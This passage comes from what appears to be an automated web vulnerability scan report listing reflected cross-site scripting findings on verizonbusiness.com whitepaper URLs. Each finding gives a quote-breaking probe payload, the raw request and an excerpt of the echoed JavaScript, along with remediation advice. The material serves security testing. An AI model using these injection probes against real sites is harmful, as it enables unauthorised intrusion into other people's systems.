The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb1da'%3baa6ecfa86e4 was submitted in the REST URL parameter 3. This input was echoed as eb1da';aa6ecfa86e4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/whitepapers/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdfeb1da'%3baa6ecfa86e4 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:06:15 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40360
Date: Wed, 17 Nov 2010 00:06:15 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:06:15 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/whitepapers/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdfeb1da';aa6ecfa86e4'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.845. http://www.verizonbusiness.com/resources/whitepapers/wp_need-standards-in-retail-it_en_xg.pdf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/wp_need-standards-in-retail-it_en_xg.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57b2c"%3b79829a858e4 was submitted in the REST URL parameter 1. This input was echoed as 57b2c";79829a858e4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources57b2c"%3b79829a858e4/whitepapers/wp_need-standards-in-retail-it_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:17:34 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40704
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:17:34 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:17:34 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources57b2c";79829a858e4/whitepapers/wp_need-standards-in-retail-it_en_xg.pdf";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM
...[SNIP]...

1.846. http://www.verizonbusiness.com/resources/whitepapers/wp_need-standards-in-retail-it_en_xg.pdf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/wp_need-standards-in-retail-it_en_xg.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e738'%3b84d75a5cf19 was submitted in the REST URL parameter 1. This input was echoed as 9e738';84d75a5cf19 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources9e738'%3b84d75a5cf19/whitepapers/wp_need-standards-in-retail-it_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:17:44 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40706
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:17:44 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:17:44 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources9e738';84d75a5cf19/whitepapers/wp_need-standards-in-retail-it_en_xg.pdf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.847. http://www.verizonbusiness.com/resources/whitepapers/wp_need-standards-in-retail-it_en_xg.pdf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/wp_need-standards-in-retail-it_en_xg.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 43b16'%3bec0f14bd8cf was submitted in the REST URL parameter 2. This input was echoed as 43b16';ec0f14bd8cf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/whitepapers43b16'%3bec0f14bd8cf/wp_need-standards-in-retail-it_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:18:02 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40314
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:18:02 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:18:02 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/whitepapers43b16';ec0f14bd8cf/wp_need-standards-in-retail-it_en_xg.pdf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.848. http://www.verizonbusiness.com/resources/whitepapers/wp_need-standards-in-retail-it_en_xg.pdf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/wp_need-standards-in-retail-it_en_xg.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e4f3"%3b254d010b133 was submitted in the REST URL parameter 2. This input was echoed as 6e4f3";254d010b133 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/whitepapers6e4f3"%3b254d010b133/wp_need-standards-in-retail-it_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:17:52 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40316
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:17:52 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:17:52 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/whitepapers6e4f3";254d010b133/wp_need-standards-in-retail-it_en_xg.pdf";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION
...[SNIP]...

1.849. http://www.verizonbusiness.com/resources/whitepapers/wp_need-standards-in-retail-it_en_xg.pdf [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/wp_need-standards-in-retail-it_en_xg.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15549"%3bf58832f9097 was submitted in the REST URL parameter 3. This input was echoed as 15549";f58832f9097 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/whitepapers/wp_need-standards-in-retail-it_en_xg.pdf15549"%3bf58832f9097 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:18:10 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40316
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:18:10 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:18:10 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
rf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/whitepapers/wp_need-standards-in-retail-it_en_xg.pdf15549";f58832f9097";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.850. http://www.verizonbusiness.com/resources/whitepapers/wp_need-standards-in-retail-it_en_xg.pdf [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/wp_need-standards-in-retail-it_en_xg.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8a3c'%3b2c739d10b11 was submitted in the REST URL parameter 3. This input was echoed as c8a3c';2c739d10b11 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/whitepapers/wp_need-standards-in-retail-it_en_xg.pdfc8a3c'%3b2c739d10b11 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:18:22 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40316
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:18:22 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:18:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/resources/whitepapers/wp_need-standards-in-retail-it_en_xg.pdfc8a3c';2c739d10b11'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.851. http://www.verizonbusiness.com/resources/whitepapers/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ad41a'%3b909ec3bb87e was submitted in the REST URL parameter 1. This input was echoed as ad41a';909ec3bb87e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesad41a'%3b909ec3bb87e/whitepapers/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:51 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40762
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:51 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resourcesad41a';909ec3bb87e/whitepapers/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.852. http://www.verizonbusiness.com/resources/whitepapers/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4c70"%3b37455aea54 was submitted in the REST URL parameter 1. This input was echoed as e4c70";37455aea54 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcese4c70"%3b37455aea54/whitepapers/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:39 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40758
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:40 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:39 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcese4c70";37455aea54/whitepapers/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTI
...[SNIP]...

1.853. http://www.verizonbusiness.com/resources/whitepapers/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 778ea"%3b427e47ae09e was submitted in the REST URL parameter 2. This input was echoed as 778ea";427e47ae09e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/whitepapers778ea"%3b427e47ae09e/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:05:14 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40370
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:05:14 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:05:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/whitepapers778ea";427e47ae09e/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS

...[SNIP]...

1.854. http://www.verizonbusiness.com/resources/whitepapers/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa942'%3bd7fa19e8fe3 was submitted in the REST URL parameter 2. This input was echoed as aa942';d7fa19e8fe3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/whitepapersaa942'%3bd7fa19e8fe3/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:05:20 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40372
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:05:20 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:05:20 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/whitepapersaa942';d7fa19e8fe3/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.855. http://www.verizonbusiness.com/resources/whitepapers/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 37b20'%3b998f6ddede4 was submitted in the REST URL parameter 3. This input was echoed as 37b20';998f6ddede4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/whitepapers/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf37b20'%3b998f6ddede4 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:05:33 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40370
Date: Wed, 17 Nov 2010 00:05:33 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:05:33 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/whitepapers/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf37b20';998f6ddede4'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.856. http://www.verizonbusiness.com/resources/whitepapers/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f8ca"%3b03e816d78eb was submitted in the REST URL parameter 3. This input was echoed as 1f8ca";03e816d78eb in the application's response.

